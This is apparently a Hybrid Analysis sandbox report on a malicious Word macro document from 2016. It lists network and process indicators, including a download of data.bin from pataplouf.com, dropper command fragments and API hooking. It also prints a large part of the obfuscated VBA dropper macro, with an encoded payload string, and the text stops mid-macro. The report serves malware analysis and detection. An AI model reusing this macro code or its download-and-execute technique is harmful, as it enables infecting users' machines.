Pellentesque Corp.#28.rtf
This report is generated from a file or URL submitted to this webservice on August 8th 2016 19:28:40 (UTC) and action script Heavy Anti-Evasion
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by
Falcon Sandbox v5.00 © Hybrid Analysis
Incident Response
Risk Assessment
- Network Behavior
- Contacts 1 domain and 1 host. View all details
Indicators
Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.
-
Malicious Indicators 9
-
External Systems
-
Detected Emerging Threats Alert
- details
- Detected alert "ET CURRENT_EVENTS Zbot Generic URI/Header Struct .bin" (SID: 2018052, Rev: 6, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
- source
- Suricata Alerts
- relevance
- 10/10
-
Detected Emerging Threats Alert
-
General
-
Document spawns new processes
- details
- Document spawned a new process (macro present)
- source
- Indicator Combinations
- relevance
- 7/10
-
GETs files from a webserver
- details
-
"GET /data.bin HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: pataplouf.com
Connection: Keep-Alive" - source
- Network Traffic
- relevance
- 10/10
-
Document spawns new processes
-
Installation/Persistance
-
Found indicators of dropper code in the commandline
- details
-
Found "... " "AyIhL4K.SENd()" "CCqqV ..." on invoke of cmd.exe (Show Process)
Found "... pv AyIhL4K.ReSpONSeBoDy" "CSb1Qh= ..." on invoke of cmd.exe (Show Process)
Found "... 4" "CSbzZ6.sAVEToFiLe Achkd7 & ..." on invoke of cmd.exe (Show Process) - source
- Monitored Target
- relevance
- 5/10
-
Shows malicious Office specific indicators
- details
- The file contains VBA macros and spawned processes in a way typical for malicious Office files
- source
- Indicator Combinations
- relevance
- 10/10
-
Found indicators of dropper code in the commandline
-
Network Related
-
Malicious artifacts seen in the context of a contacted host
- details
-
Found malicious artifacts related to "213.186.33.168" (ASN: 16276, Owner: OVH SAS): ...
URL: http://pataplouf.com/data.bin (AV positives: 5/68 scanned on 08/08/2016 17:19:12)
URL: http://pataplouf.com/ (AV positives: 1/68 scanned on 08/08/2016 16:38:04)
URL: http://macanders.fr/ (AV positives: 1/68 scanned on 08/08/2016 05:22:24)
URL: http://levincennes.be/ (AV positives: 1/68 scanned on 08/07/2016 17:35:43)
URL: http://www.drone-alsace.fr/ (AV positives: 1/68 scanned on 08/07/2016 08:39:55)
File SHA256: 0c8b939254627f5ad28de26ac2b143cdc7de49467f8097570050c48934d5a44b (AV positives: 1/53 scanned on 07/18/2016 10:37:19)
File SHA256: 5af506d60609a2e98a50707e32aee78b9b20402e603b3f55d03c3f8bccb63492 (AV positives: 1/55 scanned on 04/13/2016 05:58:38)
File SHA256: ba9ffd1fbb0a03dab0955439b4b25ae29c50d42e08b4bbb5408e07e22d43c2b8 (AV positives: 3/57 scanned on 04/11/2016 00:01:26)
File SHA256: 91a08334c89365e1c9c90cb0f5a8881e67141b21ac1683232ffcb125e3a970b7 (AV positives: 28/54 scanned on 01/31/2016 05:12:38)
File SHA256: f92bc21a965048a3087a81a282993f3d3e11fb8ca4ca84a26655529f2e3043f2 (AV positives: 33/55 scanned on 01/24/2016 17:58:11) - source
- Network Traffic
- relevance
- 10/10
-
Malicious artifacts seen in the context of a contacted host
-
System Security
-
References security related windows services
- details
- "Enabfe"
- source
- File/Memory
- relevance
- 7/10
-
References security related windows services
-
Unusual Characteristics
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
- details
- Found keyword "Document_Open" which indicates: "Runs when the Word document is opened"
- source
- Static Parser
- relevance
- 10/10
-
Document contacts a domain
- details
- This kind of behavior is often seen on document exploits or macros utilized as a dropper
- source
- Indicator Combinations
- relevance
- 3/10
-
Contains embedded VBA macros with keywords that indicate auto-execute behavior
-
Suspicious Indicators 9
-
Installation/Persistance
-
Drops executable files
- details
- "000.rob" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
- source
- Binary File
- relevance
- 10/10
-
Touches files in the Windows directory
- details
-
"WINWORD.EXE" touched file "%WINDIR%\Globalization\Sorting\sortdefault.nls"
"WINWORD.EXE" touched file "C:\Windows\Fonts\staticcache.dat"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll"
"WINWORD.EXE" touched file "C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\cversions.1.db"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db"
"WINWORD.EXE" touched file "C:\Windows\system32\rsaenh.dll"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\KERNELBASE.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32\msxml6r.dll"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6FFD5514-5D5B-48F1-83E1-5E8708FC9E80}.tmp"
"WINWORD.EXE" touched file "C:\Windows\system32\en-US\MSCTF.dll.mui"
"WINWORD.EXE" touched file "C:\Windows\System32"
"WINWORD.EXE" touched file "%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{432DDB46-44E9-4579-9602-8C7F41CE1E59}.tmp" - source
- API Call
- relevance
- 7/10
-
Drops executable files
-
Network Related
-
Uses a User Agent typical for browsers, although no browser was ever launched
- details
- Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
- source
- Network Traffic
- relevance
- 10/10
-
Uses a User Agent typical for browsers, although no browser was ever launched
-
System Security
-
Hooks API calls
- details
-
"VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
"SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
"SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
"OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
"VariantClear@OLEAUT32.DLL" in "WINWORD.EXE" - source
- Hook Detection
- relevance
- 10/10
-
Hooks API calls
-
Unusual Characteristics
-
Contains embedded VBA macros with suspicious keywords
- details
- Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
- source
- Static Parser
- relevance
- 10/10
-
Contains embedded string with suspicious keywords
- details
-
Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)" - source
- File/Memory
- relevance
- 10/10
-
Installs hooks/patches the running process
- details
-
"WINWORD.EXE" wrote bytes "b800000000663d33c0bab4ec400068dcf52462c3" to virtual address "0x05965434"
"WINWORD.EXE" wrote bytes "b5f18b19" to virtual address "0x67740BA8" (part of module "MSO.DLL")
"WINWORD.EXE" wrote bytes "1c92b119" to virtual address "0x687478E4" (part of module "OART.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba34ed400068dcf52462c3" to virtual address "0x05965474"
"WINWORD.EXE" wrote bytes "9f491b10" to virtual address "0x62311F20" (part of module "VBE7.DLL")
"WINWORD.EXE" wrote bytes "4a8c0256" to virtual address "0x61EC42C4" (part of module "MSPROOF7.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0bab4ed400068dcf52462c3" to virtual address "0x059654B4"
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba34ee400068dcf52462c3" to virtual address "0x059654F4"
"WINWORD.EXE" wrote bytes "e99e4878f0" to virtual address "0x76D63D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "e92399e5f1" to virtual address "0x756F5DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "996aae19" to virtual address "0x69A7CA70" (part of module "GFX.DLL")
"WINWORD.EXE" wrote bytes "e8126e7c" to virtual address "0x62699904" (part of module "RICHED20.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0baf4eb400068dcf52462c3" to virtual address "0x059653D4"
"WINWORD.EXE" wrote bytes "e96033e3f1" to virtual address "0x756F4731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "b800000000663d33c0ba74eb400068dcf52462c3" to virtual address "0x05965394"
"WINWORD.EXE" wrote bytes "d817627c" to virtual address "0x627A10AC" (part of module "MSPTLS.DLL")
"WINWORD.EXE" wrote bytes "13ca8aee" to virtual address "0x61AD3408" (part of module "MSCSS7EN.DLL")
"WINWORD.EXE" wrote bytes "e99a54e2f1" to virtual address "0x756F3E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e9c532f1f0" to virtual address "0x76BB6143" ("OleLoadFromStream@OLE32.DLL")
"WINWORD.EXE" wrote bytes "c4cad57680bbd57652bad5769fbbd57608bbd57646ced5766138d676de2fd676d0d9d576000000001779a9764f91a9767f6fa976f4f7a97611f7a976f283a976857ea97600000000" to virtual address "0x6E651000" (part of module "MSIMG32.DLL") - source
- Hook Detection
- relevance
- 10/10
-
Contains embedded VBA macros with suspicious keywords
-
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version
-
Informative 10
-
General
-
Contacts domains
- details
- "pataplouf.com"
- source
- Network Traffic
- relevance
- 1/10
-
Contacts server
- details
- "213.186.33.168:80"
- source
- Network Traffic
- relevance
- 1/10
-
Contains embedded VBA macros
- details
-
File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Dim NBl0Twa() As Integer
Dim EgdgXv(475 + 8525) As Long, FyDe(17288271 / 1729) As Long
Private Function BYiNP4(Ck7Z, Srq)
BYiNP4 = Ck7Z - (Srq * (Ck7Z \ Srq))
End Function
Private Function WsJBHKt(ByVal QcaXKU8 As Variant) As Long
QbUAKdx = 96
Select Case QbUAKdx
Case 6
QbUAKdx = QbUAKdx + 1
Case 32
QbUAKdx = QbUAKdx + QbUAKdx
Case Else
QbUAKdx = QbUAKdx - 1
End Select
On Error GoTo VsYxeJ
LTz1NL0 = 46
Select Case LTz1NL0
Case 70
LTz1NL0 = LTz1NL0 + 1
Case 24
LTz1NL0 = LTz1NL0 + LTz1NL0
Case Else
LTz1NL0 = LTz1NL0 - 1
End Select
Dim NNP As Long, Kg As Variant
YJS = 79
Select Case YJS
Case 74
YJS = YJS + 1
Case 18
YJS = YJS + YJS
Case Else
YJS = YJS - 1
End Select
Do
Kg = QcaXKU8(NNP)
NNP = NNP + 1
Loop
J0bONj = 18
Select Case J0bONj
Case 65
J0bONj = J0bONj + 1
Case 76
J0bONj = J0bONj + J0bONj
Case Else
J0bONj = J0bONj - 1
End Select
VsYxeJ:
Kin = 1
Select Case Kin
Case 3
Kin = Kin + 1
Case 98
Kin = Kin + Kin
Case Else
Kin = Kin - 1
End Select
If NNP = 0 Then Exit Function
EoQoD = 12
Select Case EoQoD
Case 43
EoQoD = EoQoD + 1
Case 95
EoQoD = EoQoD + EoQoD
Case Else
EoQoD = EoQoD - 1
End Select
WsJBHKt = NNP - 1
LOUmMi = 26
Select Case LOUmMi
Case 74
LOUmMi = LOUmMi + 1
Case 30
LOUmMi = LOUmMi + LOUmMi
Case Else
LOUmMi = LOUmMi - 1
End Select
End Function
Private Sub Yqa()
Omw3qFB = 43
Select Case Omw3qFB
Case 63
Omw3qFB = Omw3qFB + 1
Case 3
Omw3qFB = Omw3qFB + Omw3qFB
Case Else
Omw3qFB = Omw3qFB - 1
End Select
Mw3pvGW = 10
Select Case Mw3pvGW
Case 10
Mw3pvGW = Mw3pvGW + 1
Case 62
Mw3pvGW = Mw3pvGW + Mw3pvGW
Case Else
Mw3pvGW = Mw3pvGW - 1
End Select
End Sub
Private Function M9v(ByVal TvwRz3s As Integer) As String
VTiN = 80
Select Case VTiN
Case 24
VTiN = VTiN + 1
Case 92
VTiN = VTiN + VTiN
Case Else
VTiN = VTiN - 1
End Select
Dim AW(1) As Byte, Gz As Byte, LzxM As Byte
VP = 1
Select Case VP
Case 3
VP = VP + 1
Case 21
VP = VP + VP
Case Else
VP = VP - 1
End Select
If TvwRz3s < 0 Then Exit Function
MiP05OF = 32
Select Case MiP05OF
Case 8
MiP05OF = MiP05OF + 1
Case 26
MiP05OF = MiP05OF + MiP05OF
Case Else
MiP05OF = MiP05OF - 1
End Select
If TvwRz3s > (2088450 / 8190) Then
AVh = 22
Select Case AVh
Case 13
AVh = AVh + 1
Case 14
AVh = AVh + AVh
Case Else
AVh = AVh - 1
End Select
LzxM = 0
Else
FTanQw = 51
Select Case FTanQw
Case 37
FTanQw = FTanQw + 1
Case 51
FTanQw = FTanQw + FTanQw
Case Else
FTanQw = FTanQw - 1
End Select
Gz = TvwRz3s
Mg3o = 40
Select Case Mg3o
Case 69
Mg3o = Mg3o + 1
Case 55
Mg3o = Mg3o + Mg3o
Case Else
Mg3o = Mg3o - 1
End Select
LzxM = 0
Bn2 = 26
Select Case Bn2
Case 65
Bn2 = Bn2 + 1
Case 20
Bn2 = Bn2 + Bn2
Case Else
Bn2 = Bn2 - 1
End Select
End If
FUgG3DV = 5
Select Case FUgG3DV
Case 87
FUgG3DV = FUgG3DV + 1
Case 14
FUgG3DV = FUgG3DV + FUgG3DV
Case Else
FUgG3DV = FUgG3DV - 1
End Select
AW(0) = Gz
LO2je6 = 92
Select Case LO2je6
Case 26
LO2je6 = LO2je6 + 1
Case 98
LO2je6 = LO2je6 + LO2je6
Case Else
LO2je6 = LO2je6 - 1
End Select
AW(1) = LzxM
POBXiC = 17
Select Case POBXiC
Case 64
POBXiC = POBXiC + 1
Case 49
POBXiC = POBXiC + POBXiC
Case Else
POBXiC = POBXiC - 1
End Select
M9v = AW
NGmV19dWO = 28
Select Case NGmV19dWO
Case 57
NGmV19dWO = NGmV19dWO + 1
Case 71
NGmV19dWO = NGmV19dWO + NGmV19dWO
Case Else
NGmV19dWO = NGmV19dWO - 1
End Select
End Function
Private Function VA(RZG, Iriv)
PW = 89
Select Case PW
Case 20
PW = PW + 1
Case 82
PW = PW + PW
Case Else
PW = PW - 1
End Select
VA = (RZG And Not Iriv) Or (Not RZG And Iriv)
GLjw = 63
Select Case GLjw
Case 64
GLjw = GLjw + 1
Case 61
GLjw = GLjw + GLjw
Case Else
GLjw = GLjw - 1
End Select
End Function
Private Function Y7Y(UKua As Long, TD As Long) As Byte
JC = 93
Select Case JC
Case 83
JC = JC + 1
Case 31
JC = JC + JC
Case Else
JC = JC - 1
End Select
Dim M9A6aeb As Long, T2KcY As Long
DHNv8e = 25
Select Case DHNv8e
Case 90
DHNv8e = DHNv8e + 1
Case 68
DHNv8e = DHNv8e + DHNv8e
Case Else
DHNv8e = DHNv8e - 1
End Select
For M9A6aeb = (199104 / 4148) To (78147 / 1371)
If Ec(UKua, TD, 1) = T2KcY Then Y7Y = M9A6aeb: Exit For
T2KcY = T2KcY + 1
Next M9A6aeb
Fm = 36
Select Case Fm
Case 31
Fm = Fm + 1
Case 74
Fm = Fm + Fm
Case Else
Fm = Fm - 1
End Select
End Function
Private Sub LZkN()
GMqI = 62
Select Case GMqI
Case 4
GMqI = GMqI + 1
Case 80
GMqI = GMqI + GMqI
Case Else
GMqI = GMqI - 1
End Select
Dim UE8Gpx As String
MYTdoy = 84
Select Case MYTdoy
Case 85
MYTdoy = MYTdoy + 1
Case 82
MYTdoy = MYTdoy + MYTdoy
Case Else
MYTdoy = MYTdoy - 1
End Select
GuqR = 5
Select Case GuqR
Case 76
GuqR = GuqR + 1
Case 8
GuqR = GuqR + GuqR
Case Else
GuqR = GuqR - 1
End Select
UE8Gpx = "31496r-4063r-28867r-32724r-32585r-23532r-15421r-25145r9161r-19712r-28664r-14916r22183r11252r55r6824r5318r3713r-30077r6705r2361r-27574r-26417r7792r4218r32296r26686r-29709r22313r-11613r-1285r-5693r-31802r-15467r23095r-3615r17263r7930r22477r3930r-12355r22162r-1028r-17707r-8621r-683r-29369r11738r5962r-22888r-17510r22297r1674r-1969r-9779r-17594r13478r-24631r-28908r6940r-20264r11038r16859r-32712r14969r2215r1039r311r-19066r-6077r27924r19554r-25262r4738r6411r-14041r31178r25242r-4675r-13608r22229r6254r26023r25823r7974r30076r-31547r12011r-14787r7030r-14097r9768r-25983r8144r-16039r-12136r19116r1818r-5617r30302r29739r26704r2966r12364r-9332r-18102r-20392r32736r-27385r7829r-28664r-27814r23900r-18185r-2044r28337r-32730r29804r-14122r-1566r-16149r31625r2883r-130"
LG8RS = 37
Select Case LG8RS
Case 66
LG8RS = LG8RS + 1
Case 52
LG8RS = LG8RS + LG8RS
Case Else
LG8RS = LG8RS - 1
End Select
UE8Gpx = UE8Gpx & "40r1231r20081r-14492r8321r-8625r2896r-18218r-25758r-24474r-2717r-28083r-10415r-27872r-3832r-25211r11273r8227r20701r-22149r-5280r26856r-29906r28817r21758r3956r-5333r-12633r13866r7178r-20528r9890r-10826r-13297r-24511r12876r-13514r-25398r13495r-31710r3756r26617r27224r21443r24741r-10914r-9369r22667r26613r-28246r-17826r-17798r29546r28610r15048r-29817r-23183r-4369r3294r15086r-4090r14331r1476r19587r16120r21998r14694r-19669r-2996r-28184r-19996r25116r21053r-9708r-2751r17404r-23396r3470r1r-27958r18114r19151r-16088r-9787r32413r-10484r12567r-18654r21776r-11625r-1024r-20341r-32128r-26733r16153r8032r31707r15636r-22720r-20395r-10172r16240r-7273r1204r-26576r-1981r-26404r5252r989r-20324r15989r-6594r24714r25529r22171r-4727r183r22080r31784r-3924r-11213r25605r25437"
K4P7y = 53
Select Case K4P7y
Case 18
K4P7y = K4P7y + 1
Case 23
K4P7y = K4P7y + K4P7y
Case Else
K4P7y = K4P7y - 1
End Select
UE8Gpx = UE8Gpx & "r21614r-31103r22021r11321r-14122r-9901r31349r-7237r-32035r16197r26541r-16500r19100r-22385r8394r5229r19364r1855r21153r-9928r797r-2090r-26556r29075r-6903r-2361r-3485r13222r-4065r-24355r12429r26695r13698r29715r-8318r27784r4680r7804r-21575r29118r28780r28655r-11414r-5492r-1397r-28275r-24659r22859r8129r-32354r-2433r22974r-30540r3249r-16585r-2385r-11683r-22725r14687r-32761r-26319r11110r-9311r5004r-25592r-6572r7060r-30539r-7247r-8430r23815r-12273r31615r11544r-32217r29845r-18587r-11501r-6258r32649r-28821r3934r-19566r-30077r14721r9352r-23802r-26656r4629r23544r-15611r7356r-7271r18769r1720r-29080r29630r299r-16487r-1656r16288r-6666r22891r-658r-4253r-32391r7834r19931r20449r31331r-2049r-15476r-4720r-15308r-16332r-22471r19221r11037r-19984r-29759r13176r1787r-414"
T1QD7xP = 72
Select Case T1QD7xP
Case 47
T1QD7xP = T1QD7xP + 1
Case 48
T1QD7xP = T1QD7xP + T1QD7xP
Case Else
T1QD7xP = T1QD7xP - 1
End Select
UE8Gpx = UE8Gpx & "1r-9103r1543r31645r-2023r3905r-23819r31233r17517r14438r4935r7598r24798r-31468r-7629r1260r6738r-31333r-28265r13184r-18947r-19791r-12883r10390r-15349r-31036r7957r20368r7090r-28601r-31515r22135r-11530r-28068r-26119r-6213r-1599r-4528r-4530r25028r-13475r1344r25446r7524r9569r-18903r21388r-22255r28486r5886r8349r-2177r-12071r-18763r-3651r-30781r837r-11993r20008r-19480r13783r21609r25775r22720r-6239r-15830r-9631r17627r-28486r12980r15616r-2646r13912r-5258r4902r21227r20696r-27513r8843r-22974r24214r22727r-30809r-13268r-19318r12237r1675r23924r28305r-3042r14608r-17886r5709r23652r-27941r31394r-29461r21642r26570r-9442r-18605r-14914r-16682r-31867r4151r19784r-12643r19951r27581r26965r-15842r-21951r8920r27244r-17264r-9439r29475r-23974r-23342r15366r8618r26872r24623r1"
OO799n = 24
Select Case OO799n
Case 18
OO799n = OO799n + 1
Case 62
OO799n = OO799n + OO799n
Case Else
OO799n = OO799n - 1
End Select
UE8Gpx = UE8Gpx & "4347r10306r20535r21002r-3531r-28302r-31532r-1340r-18567r-14048r-19823r30519r-24381r-15991r-17967r-4302r-21917r-4542r-7235r-18397r32461r-10353r7996r28059r-16544r3587r-28566r283r1920r-17898r-31706r-6059r21297r-1028r-4367r-14296r28967r-28887r17520r19667r-10883r25313r21918r-13000r-10580r-11287r15617r-28573r-29317r23405r14443r30167r4645r7768r-21158r-9567r8734r-8133r17984r-6882r9710r-24737r-32010r2873r-15572r-15666r20694r19901r-32601r24911r-29566r26496r15516r645r-28573r30613r-26644r29230r44r-19315r-12336r-7242r-3704r20121r-6585r-9358r32072r-28477r9215r31229r31696r-10656r-5735r-22737r4843r20108r-30481r10134r3459r7232r-21461r22261r-31919r-23868r13908r18420r18486r28323r30935r-19585r-12807r-853r-8821r9566r-11736r16211r14404r23066r-19070r4867r19751r32420r5"
DJN7k = 85
Select Case DJN7k
Case 61
DJN7k = DJN7k + 1
Case 79
DJN7k = DJN7k + DJN7k
Case Else
DJN7k = DJN7k - 1
End Select
UE8Gpx = UE8Gpx & "318r10722r-8542r-25285r1178r-3451r-24207r-15167r-25907r-3474r19241r2592r-12178r-11019r-1680r-31370r15778r-1941r31181r-3880r-26377r32199r-30417r-22770r22632r24841r3307r-4708r29638r-11092r16061r1690r22647r2759r28944r31127r30477r4030r-2406r-12531r30186r-23356r21963r-131r3879r7474r-26318r-11875r-27520r-6725r18588r15016r-26913r1971r-29640r21739r15026r14521r-4924r-30322r19033r24619r23440r-6498r-22030r-11188r-6659r15641r-4033r9991r30928r-12931r7896r-3152r8075r-15003r26938r3431r-32393r29383r-21371r-28635r24349r-13248r27098r16219r15389r-16480r7989r-18389r17095r18890r-1253r-30623r-8854r19229r-5926r31940r-30657r-29171r-12706r-15318r32526r24403r28608r-30637r-7686r-8648r-18715r21533r-27710r-17107r-18545r3907r29834r-30436r28824r-16259r-20136r6494r11040r5154r3"
MOa = 23
Select Case MOa
Case 35
MOa = MOa + 1
Case 71
MOa = MOa + MOa
Case Else
MOa = MOa - 1
End Select
UE8Gpx = UE8Gpx & "369r-4590r-22397r-32373r-2582r-23738r29342r20332r14917r-272r-19574r16094r24722r11788r239r-11315r-7949r5174r-17097r2190r-11213r-17993r-32491r-15124r22306r-13869r2224r21720r25740r-26852r14698r17001r6667r-31102r4244r27337r-17595r12420r23487r21572r22523r16336r-32061r-14279r2256r-14679r539r26568r16732r26727r-16366r17072r-11988r21976r31421r13817r-28556r31989r32155r-19762r-10730r-9056r-29485r-4287r-18592r-25355r-18112r23842r26444r-24158r23220r-29887r17391r12538r16213r-6244r-17750r23327r-29549r-9619r20839r-31856r9533r8474r-27155r2466r-23997r-12277r17087r11263r-6925r-8360r-12070r-12470r5085r20734r11981r-10776r-9415r-3640r10034r10667r-3749r82r32230r-24026r2272r29736r-19323r28987r-28822r23661r31143r-2224r-12599r-30697r-8801r-891r-20244r3693r-15750r-8695r46"
BXoy = 48
Select Case BXoy
Case 58
BXoy = BXoy + 1
Case 29
BXoy = BXoy + BXoy
Case Else
BXoy = BXoy - 1
End Select
UE8Gpx = UE8Gpx & "15r20099r-13428r4548r26250r1657r-3137r28229r-21648r19436r-1234r-27395r-12133r14291r32454r-11773r24095r28312r-7931r-19689r-23446r-13878r-30774r32252r6916r30660r-20417r25765r-7555r-2225r22894r-28412r-29695r26514r-15417r17156r27047r21959r23470r-592r-29279r-6399r13318r-3136r20184r32246r-22702r-8107r-2658r-28751r-5780r8906r18653r7262r14551r16045r12136r-15803r20399r10871r-23769r-13237r-20909r-20129r10461r7477r-27292r-30437r20979r-30075r2641r-22123r4457r10097r-17978r-19941r-32463r12038r18321r26726r24370r27314r4364r-19075r-28417r23367r-10847r27630r-10166r-22510r-17671r23842r28452r-1095r6330r14528r-12361r-5723r5495r14370r29870r-16457r-17569r-10664r16744r11738r24370r-8547r-25070r11005r-26915r-6196r-22494r-22378r11232r1983r11285r6358r-8910r2239r-6703r-6528"
RTaW = 95
Select Case RTaW
Case 27
RTaW = RTaW + 1
Case 34
RTaW = RTaW + RTaW
Case Else
RTaW = RTaW - 1
End Select
UE8Gpx = UE8Gpx & "r-22578r8292r-30012r14454r-3176r19307r26790r-32129r-3280r-19628r-6254r4996r-11474r-3210r-27136r12954r28656r8392r-30844r19334r-25358r3156r-31513r-11184r32258r6891r-31079r9448r-23455r15777r25160r6244r5251r-613r-32407r-27396r-30212r12855r31586r4812r-18392r-26918r-15061r-6677r-29482r-15254r15070r-18465r28641r10667r28483r5448r4644r23775r4114r-19047r16828r-11300r-11156r3927r-98r-9863r16116r29025r660r-26962r-26984r-31436r17655r-5628r-31550r-21256r13818r-3161r2328r28396r-14594r32411r-3204r-22331r31603r-9908r25467r-9348r-17456r-8823r-7726r-20140r12817r4927r-10920r-25663r-23152r31639r6791r11041r5095r12512r-25302r-8477r-11355r19753r15372r-15197r19466r-5191r1084r-26647r-22971r-2147r-12069r-21560r14404r2486r-30292r7751r-294r-27208r27430r-13507r-2410r-6948r-1"
C2s = 18
Select Case C2s
Case 87
C2s = C2s + 1
Case 52
C2s = C2s + C2s
Case Else
C2s = C2s - 1
End Select
UE8Gpx = UE8Gpx & "1319r-17297r-5475r-28082r-32694r30426r27513r24583r-31587r9092r-15285r7491r2258r1811r31620r3915r-24566r-22460r-13806r-28399r3289r-26050r2642r-17324r30492r29107r-8858r-24016r6165r16012r-17817r-2338r1151r8962r-2099r13789r-14684r-6869r25083r-13830r-17593r-7377r-18528r1982r-15714r-2362r4831r-12986r-20104r32333r-14722r-11538r-21740r-10444r-10655r17366r25525r24281r16935r-12935r-25151r7627r1149r14002r-27908r-28040r-5065r21477r-2269r-5504r-12317r-28750r18202r-16838r32250r-5556r12283r1918r-6958r22235r-30705r7159r-20595r6014r865r-8462r-30073r-5807r-31568r31378r18838r9835r-28786r-8287r385r12230r-4493r30594r-25297r-12412r-30043r-6320r29712r-14195r16536r27392r8423r-25638r25508r16098r-27276r-17631r24803r15438r-25816r12521r-17431r-19635r-4691r24290r30369r-1560r"
YtnV6 = 17
Select Case YtnV6
Case 76
YtnV6 = YtnV6 + 1
Case 72
YtnV6 = YtnV6 + YtnV6
Case Else
YtnV6 = YtnV6 - 1
End Select
UE8Gpx = UE8Gpx & "16039r28106r26054r26483r21123r-27291r10237r-17788r7285r-17883r19395r10110r-354r1017r16545r21865r14553r3129r-20526r30847r-8085r22017r-17891r-7613r-22100r32765r4932r-2563r23406r-9372r-19365r-11845r-18909r23247r-15169r7177r-9532r-17621r-26053r23670r14263r6985r28417r-2478r-26683r591r-26309r-8323r19799r13029r-11752r-22580r25074r-5247r-24847r-16744r-28307r2917r10766r-4018r29125r27628r24499r19542r23111r14420r-18156r-14520r3440r-31082r-28609r16041r-21036r16554r22188r-10503r13209r23220r26607r-31200r22491r-6414r23992r1091r-21795r2172r17322r-18626r17230r-579r15840r-25593r9860r19329r11562r8349r13024r15723r-28616r11766r29491r7344r-21468r-4361r6468r5436r23321r-4129r7806r21770r-9666r5682r-9430r-12935r4572r-3150r-6993r3993r-1762r14314r-14239r17069r-16966r28656r"
NQM3M = 96
Select Case NQM3M
Case 63
NQM3M = NQM3M + 1
Case 63
NQM3M = NQM3M + NQM3M
Case Else
NQM3M = NQM3M - 1
End Select
UE8Gpx = UE8Gpx & "-31427r31834r-2393r12201r-4425r31910r9323r3796r-31504r27610r6332r-9097r-27367r4499r27511r6328r-26411r-15017r23691r12374r31415r24741r13483r-19823r-21641r-676r5504r21363r28838r26646r28234r-22031r-26883r27650r-22229r18087r-7801r28377r-13030r71r-10293r-30294r-3537r12303r-903r19652r-22263r15329r-7742r12328r28433r-2960r14645r-10948r-3239r5243r-3267r-30044r-30887r31163r-19348r-2682r-17219r-23829r-25300r13369r-9993r22932r611r-18646r9189r-16747r-25163r-1104r27667r16607r11477r30572r32465r20195r-26219r27462r-24045r18246r10512r7533r-7459r14407r18970r16384r3295r22636r26573r-4288r27714r-26233r19303r19745r12935r-12765r1064r2986r-15839r-21554r5833r20398r-19093r20363r-15621r-24023r24079r-7215r-19198r-24215r-8294r1543r-22368r4342r31613r-18311r4186r15345r-2857r-93"
G5ynVj = 87
Select Case G5ynVj
Case 31
G5ynVj = G5ynVj + 1
Case 73
G5ynVj = G5ynVj + G5ynVj
Case Else
G5ynVj = G5ynVj - 1
End Select
